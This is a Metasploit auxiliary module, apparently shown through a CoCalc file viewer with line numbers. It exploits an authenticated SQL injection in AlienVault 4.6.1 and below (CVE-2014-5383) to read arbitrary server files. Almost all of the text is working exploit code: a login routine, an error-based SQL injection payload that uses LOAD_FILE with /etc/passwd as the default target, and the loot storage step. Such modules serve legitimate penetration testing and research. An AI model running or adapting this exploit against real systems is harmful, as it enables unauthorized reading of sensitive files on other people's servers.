CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info={})
10
    super(update_info(info,
11
      'Name'           => "AlienVault Authenticated SQL Injection Arbitrary File Read",
12
      'Description'    => %q{
13
        AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
14
        newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability
15
        to read an arbitrary file from the file system. Any authenticated user is able to exploit
16
        this, as administrator privileges are not required.
17
      },
18
      'License'        => MSF_LICENSE,
19
      'Author'         =>
20
        [
21
          'Chris Hebert <chrisdhebert[at]gmail.com>'
22
        ],
23
      'References'     =>
24
        [
25
          ['CVE', '2014-5383'],
26
          ['OSVDB', '106815'],
27
          ['EDB', '33317'],
28
          ['URL', 'http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower']
29
        ],
30
      'DefaultOptions'  =>
31
        {
32
          'SSL' => true
33
        },
34
      'Privileged'     => false,
35
      'DisclosureDate' => '2014-05-09'))
36

37
      register_options([
38
        Opt::RPORT(443),
39
        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
40
        OptString.new('USERNAME', [ true, 'Single username' ]),
41
        OptString.new('PASSWORD', [ true, 'Single password' ]),
42
        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
43
        OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
44
      ])
45
  end
46

47
  def run
48

49
    print_status("Get a valid session cookie...")
50
    res = send_request_cgi({
51
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
52
    })
53

54
    unless res && res.code == 200
55
      print_error("Server did not respond in an expected way")
56
      return
57
    end
58

59
    cookie = res.get_cookies
60

61
    if cookie.blank?
62
      print_error("Could not retrieve a cookie")
63
      return
64
    end
65

66
    post = {
67
      'embed' => '',
68
      'bookmark_string' => '',
69
      'user' => datastore['USERNAME'],
70
      'passu' => datastore['PASSWORD'],
71
      'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
72
    }
73

74
    print_status("Login...")
75

76
    res = send_request_cgi({
77
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
78
      'method' => 'POST',
79
      'vars_post' => post,
80
      'cookie' => cookie
81
    })
82

83
    unless res && res.code == 302
84
      print_error("Server did not respond in an expected way")
85
      return
86
    end
87

88
    unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')
89
      print_error("Authentication failed")
90
      return
91
    end
92

93
    cookie = res.get_cookies
94

95
    if cookie.blank?
96
      print_error("Could not retrieve the authenticated cookie")
97
      return
98
    end
99

100
    i = 0
101
    full = ''
102
    filename = datastore['FILEPATH'].unpack("H*")[0]
103
    left_marker = Rex::Text.rand_text_alpha(6)
104
    right_marker = Rex::Text.rand_text_alpha(6)
105
    sql_true = Rex::Text.rand_text_alpha(6)
106

107
    print_status("Exploiting SQLi...")
108

109
    begin
110
      ::Timeout.timeout(datastore['SQLI_TIMEOUT']) do
111
        loop do
112
          file = sqli(left_marker, right_marker, sql_true, i, cookie, filename)
113
          return if file.nil?
114
          break if file.empty?
115

116
          str = [file].pack("H*")
117
          full << str
118
          vprint_status(str)
119

120
          i = i+1
121
        end
122
      end
123
    rescue ::Timeout::Error
124
      if full.blank?
125
        print_error("Timeout while exploiting sqli, nothing recovered")
126
      else
127
        print_error("Timeout while exploiting sqli, #{full.length} bytes recovered")
128
      end
129
      return
130
    end
131

132
    path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
133
    print_good("File stored at path: " + path)
134
  end
135

136
  def sqli(left_marker, right_marker, sql_true, i, cookie, filename)
137
    pay =  "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
138
    pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
139
    pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
140
    pay << " GROUP BY x)a) AND ('0x#{sql_true.unpack("H*")[0]}'='0x#{sql_true.unpack("H*")[0]}"
141

142
    get = {
143
      'insertafter' => pay,
144
      'ctx' => 0
145
    }
146

147
    res = send_request_cgi({
148
      'uri' => normalize_uri(target_uri.path, 'ossim', 'policy', 'newpolicyform.php'),
149
      'cookie' => cookie,
150
      'vars_get' => get
151
    })
152

153
    if res && res.body && res.body =~ /#{left_marker}(.*)#{right_marker}/
154
      return $1
155
    else
156
      print_error("Server did not respond in an expected way")
157
      return nil
158
    end
159
  end
160
end
161

162